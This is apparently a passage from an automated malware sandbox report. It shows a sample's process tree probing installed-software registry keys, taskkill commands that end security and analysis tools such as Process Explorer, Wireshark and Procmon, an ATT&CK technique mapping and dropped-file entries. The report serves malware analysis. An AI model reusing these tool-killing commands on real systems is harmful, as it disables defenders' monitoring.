                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5072
                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:5112
                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:3772
                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3436
                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:4120
                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4176
                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4196
                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:4228
                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4280
                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:4328
                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:4348
                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4412
                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:4432
                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4488
                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:4572
                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:4592
                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:4640
                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4668
                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:4696
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:4780
                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4776
                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4728
                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4856
                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:4876
                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:4968
                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5044
                                                                                                                                                                                                                                                                              • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:5000
                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:5072
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:3588
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:4184
                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:4176
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:4332
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:4324
                                                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                            cmd.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:4400
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:4432
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:4560
                                                                                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd.exe
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:4580
                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:4684
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:4668
                                                                                                                                                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                        cmd.exe
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:4804
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:4720
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:4900
                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                              cmd.exe
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:4876
                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4968
                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:5108
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd.exe
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                        reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:4104
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                          cmd.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:4184
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                              reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:4372
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                  PID:4424
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                cmd.exe
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                      PID:4656
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                      reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:4684
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                                                                                                      cmd.exe
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:4796
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                          reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4864
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                                                                                            reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:5052
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:4968
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:4712
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:4920
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:5000
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:4900
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:756

                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                        2
                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1158

                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                        3
                                                                                                                                                                                                                                                                                                                                        T1112

                                                                                                                                                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1089

                                                                                                                                                                                                                                                                                                                                        Hidden Files and Directories

                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                        T1158

                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\.ntusernt.ini
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\UaoPj\Desktop.ini
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\UaoPj\SbBYi.class
                                                                                                                                                                                                                                                                                                                                        • \Users\Admin\AppData\Local\Temp\enPAMRFmEe7825241238734541407.xml
                                                                                                                                                                                                                                                                                                                                        • memory/412-47-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/416-106-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/524-45-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/560-44-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/756-253-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/788-98-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/808-46-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/860-119-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/860-109-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/864-71-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/864-107-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/912-70-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/912-110-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/980-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1028-141-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1172-48-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1224-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1224-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1228-83-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1416-49-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1448-79-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1452-123-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1548-87-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1548-135-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1576-99-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1580-51-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1628-69-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1700-72-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1708-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1736-66-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1804-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1804-142-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1804-124-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1812-92-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1824-73-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1856-86-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1864-126-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/1936-53-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2052-54-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2080-55-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2088-100-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2100-76-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2132-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2140-56-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2148-112-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2148-88-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2192-82-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2192-101-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2196-94-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2256-145-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2708-103-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2716-57-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2808-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2820-77-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2824-58-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2884-102-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2980-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2980-85-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2980-97-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2988-96-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/2992-61-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3020-108-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3024-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3160-104-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3304-144-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3344-67-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3360-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3360-78-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3388-117-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3396-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3420-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3436-190-0x0000000000000000-mapping.dmp
